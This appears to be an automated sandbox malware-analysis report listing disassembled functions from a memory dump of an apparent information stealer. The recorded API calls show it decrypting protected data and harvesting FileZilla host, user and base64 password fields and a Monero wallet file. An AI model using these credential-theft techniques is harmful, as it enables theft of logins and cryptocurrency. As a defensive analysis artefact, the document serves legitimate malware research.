                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharCreateInstanceMultiWide
                              • String ID:
                              • API String ID: 123533781-0
                              • Opcode ID: 2d2a13172cd4cefb56ecefa98beaacf3919802adba1984659d653ecd45c82c4e
                              • Instruction ID: 988228fae928aababa5045e20ebd0a29ae38a51509675d52d2370718cf58c07e
                              • Opcode Fuzzy Hash: 2d2a13172cd4cefb56ecefa98beaacf3919802adba1984659d653ecd45c82c4e
                              • Instruction Fuzzy Hash: D641F770A40A289FDB24DF58CC99B9BB7B4BB49702F4042D8F608A7290D7756EC5CF50
                              Function 00799B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00799B84
                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 00799BA3
                              • LocalFree.KERNEL32(?), ref: 00799BD3
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$AllocCryptDataFreeUnprotect
                              • String ID:
                              • API String ID: 2068576380-0
                              • Opcode ID: 945d3b42aae2dd1056e3eda32c0065661fa34d83c80665a7de36308f80cfe631
                              • Instruction ID: 671f6d55d3368a982aaac860c2b5ce166ac5a7f6a006bf3bd7de906a0cd78f39
                              • Opcode Fuzzy Hash: 945d3b42aae2dd1056e3eda32c0065661fa34d83c80665a7de36308f80cfe631
                              • Instruction Fuzzy Hash: 5F1109B8A00209EFDB04DF98D985AAEB7B5FF88300F104599ED15A7350D774AE50CFA1
                              Function 00B53A80 Relevance: 4.1, Strings: 2, Instructions: 1597COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: "F_p$)@7O
                              • API String ID: 0-2496068091
                              • Opcode ID: 6cb1bb38ba7f2a0565cfd804df6cee8d6a1f85240e4d7a2c57f1355f0042bddc
                              • Instruction ID: f756dd14a806a95b1e2a147775cf7eaffb4dd892d06ba631e9d2dd33f9660fa2
                              • Opcode Fuzzy Hash: 6cb1bb38ba7f2a0565cfd804df6cee8d6a1f85240e4d7a2c57f1355f0042bddc
                              • Instruction Fuzzy Hash: D8B219F3A08204AFE314AE2DDC4567AF7E9EF94320F1A493DEAC4D7744EA3558018697
                              Function 00A6DEA5 Relevance: 1.5, Strings: 1, Instructions: 237COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: uES
                              • API String ID: 0-2569654800
                              • Opcode ID: 0f0d9ab50c1a2e962cbe4ac207ca31add8d4175facb133ae70893c525c275589
                              • Instruction ID: 3c2f8aff65b5132c733c3d39140fd29b1ae25095faa25eba89c9ee96132edcdd
                              • Opcode Fuzzy Hash: 0f0d9ab50c1a2e962cbe4ac207ca31add8d4175facb133ae70893c525c275589
                              • Instruction Fuzzy Hash: 6871E7F3A1C7149FE318AE2DDC8577AFBE5DB94710F26863DE6C483788E93458044686
                              Function 00A4BD01 Relevance: 1.5, Strings: 1, Instructions: 228COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: [-
                              • API String ID: 0-1423068511
                              • Opcode ID: d552eb6a29a658ad57f85e8dfd6de74be0d350c51caf88520aedff0faaaf17a0
                              • Instruction ID: 14a1933f287686f1e10ca39af152088a81db949fb94a7f224791631c55847e89
                              • Opcode Fuzzy Hash: d552eb6a29a658ad57f85e8dfd6de74be0d350c51caf88520aedff0faaaf17a0
                              • Instruction Fuzzy Hash: 216113F2A082046FE308AE19DC8573AB7E5EF94710F15C93DE6C9C7780E6755C018796
                              Function 00C78D90 Relevance: .3, Instructions: 337COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0f46417dd606f789b981d13ee947d12c861a54fdce35d2af7ecc958492b70135
                              • Instruction ID: f036d27101c0119c66409f4150dccc3641de162f43f72b08fc1c120cab1a4ab4
                              • Opcode Fuzzy Hash: 0f46417dd606f789b981d13ee947d12c861a54fdce35d2af7ecc958492b70135
                              • Instruction Fuzzy Hash: B7B12AF3A081009FE7149E19DC8476AB7E6EFD8710F2AC43DEAC893748E5399C098756
                              Function 00ADADCF Relevance: .2, Instructions: 197COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 573321ee04ae4f908bd86d8b5918ba9bb6a48244f5d52f8869dde6b69abc5541
                              • Instruction ID: 47098a8406bbaf09821af7dc565621fc6741762b836a7c74b8c38853edbd916e
                              • Opcode Fuzzy Hash: 573321ee04ae4f908bd86d8b5918ba9bb6a48244f5d52f8869dde6b69abc5541
                              • Instruction Fuzzy Hash: B561C2B39087049FE340AE29DC8066AF7E6EFD4720F2AC93DE5D487744E63499418B93
                              Function 00A77E8A Relevance: .2, Instructions: 177COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0e34d29a5d6e61b761d7d678a462e8be208931f7c783290a8082a5929853213d
                              • Instruction ID: c4b3b8c8646cd01a2220e412f0f99e8425ce519912056ab874b491ab905528c3
                              • Opcode Fuzzy Hash: 0e34d29a5d6e61b761d7d678a462e8be208931f7c783290a8082a5929853213d
                              • Instruction Fuzzy Hash: 4E51E2F3E186105BF708592ADC8937AB6D7DBD4320F2A813DD78987788E83958068296
                              Function 00B19255 Relevance: .2, Instructions: 166COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 93caabaaf2f716566b43f18a669e12c1d759fed507b1debd57799386a529b94f
                              • Instruction ID: a5f409b246fa377e7b39f64c2e2f058fe8755f4bf9bcdd41b7ff87f07aefa4fd
                              • Opcode Fuzzy Hash: 93caabaaf2f716566b43f18a669e12c1d759fed507b1debd57799386a529b94f
                              • Instruction Fuzzy Hash: DC415BF3A042089BF3106D2DEC457BBF796EBD4330F1A413DE98497754E93A5D068682
                              Function 007A9750 Relevance: .0, Instructions: 15COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                              • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                              Function 007A0250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 007AA740: lstrcpy.KERNEL32(007B0E17,00000000), ref: 007AA788
                                • Part of subcall function 007A8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 007A8E0B
                                • Part of subcall function 007AA920: lstrcpy.KERNEL32(00000000,?), ref: 007AA972
                                • Part of subcall function 007AA920: lstrcat.KERNEL32(00000000), ref: 007AA982
                                • Part of subcall function 007AA8A0: lstrcpy.KERNEL32(?,007B0E17), ref: 007AA905
                                • Part of subcall function 007AA9B0: lstrlen.KERNEL32(?,014C9130,?,\Monero\wallet.keys,007B0E17), ref: 007AA9C5
                                • Part of subcall function 007AA9B0: lstrcpy.KERNEL32(00000000), ref: 007AAA04
                                • Part of subcall function 007AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 007AAA12
                                • Part of subcall function 007AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 007AA7E6
                                • Part of subcall function 007999C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007999EC
                                • Part of subcall function 007999C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00799A11
                                • Part of subcall function 007999C0: LocalAlloc.KERNEL32(00000040,?), ref: 00799A31
                                • Part of subcall function 007999C0: ReadFile.KERNEL32(000000FF,?,00000000,0079148F,00000000), ref: 00799A5A
                                • Part of subcall function 007999C0: LocalFree.KERNEL32(0079148F), ref: 00799A90
                                • Part of subcall function 007999C0: CloseHandle.KERNEL32(000000FF), ref: 00799A9A
                                • Part of subcall function 007A8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 007A8E52
                              • GetProcessHeap.KERNEL32(00000000,000F423F,007B0DBA,007B0DB7,007B0DB6,007B0DB3), ref: 007A0362
                              • RtlAllocateHeap.NTDLL(00000000), ref: 007A0369
                              • StrStrA.SHLWAPI(00000000,<Host>), ref: 007A0385
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,007B0DB2), ref: 007A0393
                              • StrStrA.SHLWAPI(00000000,<Port>), ref: 007A03CF
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,007B0DB2), ref: 007A03DD
                              • StrStrA.SHLWAPI(00000000,<User>), ref: 007A0419
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,007B0DB2), ref: 007A0427
                              • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 007A0463
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,007B0DB2), ref: 007A0475
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,007B0DB2), ref: 007A0502
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,007B0DB2), ref: 007A051A
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,007B0DB2), ref: 007A0532
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,007B0DB2), ref: 007A054A
                              • lstrcat.KERNEL32(?,browser: FileZilla), ref: 007A0562
                              • lstrcat.KERNEL32(?,profile: null), ref: 007A0571
                              • lstrcat.KERNEL32(?,url: ), ref: 007A0580
                              • lstrcat.KERNEL32(?,00000000), ref: 007A0593
                              • lstrcat.KERNEL32(?,007B1678), ref: 007A05A2
                              • lstrcat.KERNEL32(?,00000000), ref: 007A05B5
                              • lstrcat.KERNEL32(?,007B167C), ref: 007A05C4
                              • lstrcat.KERNEL32(?,login: ), ref: 007A05D3
                              • lstrcat.KERNEL32(?,00000000), ref: 007A05E6
                              • lstrcat.KERNEL32(?,007B1688), ref: 007A05F5
                              • lstrcat.KERNEL32(?,password: ), ref: 007A0604
                              • lstrcat.KERNEL32(?,00000000), ref: 007A0617
                              • lstrcat.KERNEL32(?,007B1698), ref: 007A0626
                              • lstrcat.KERNEL32(?,007B169C), ref: 007A0635
                              • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,007B0DB2), ref: 007A068E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
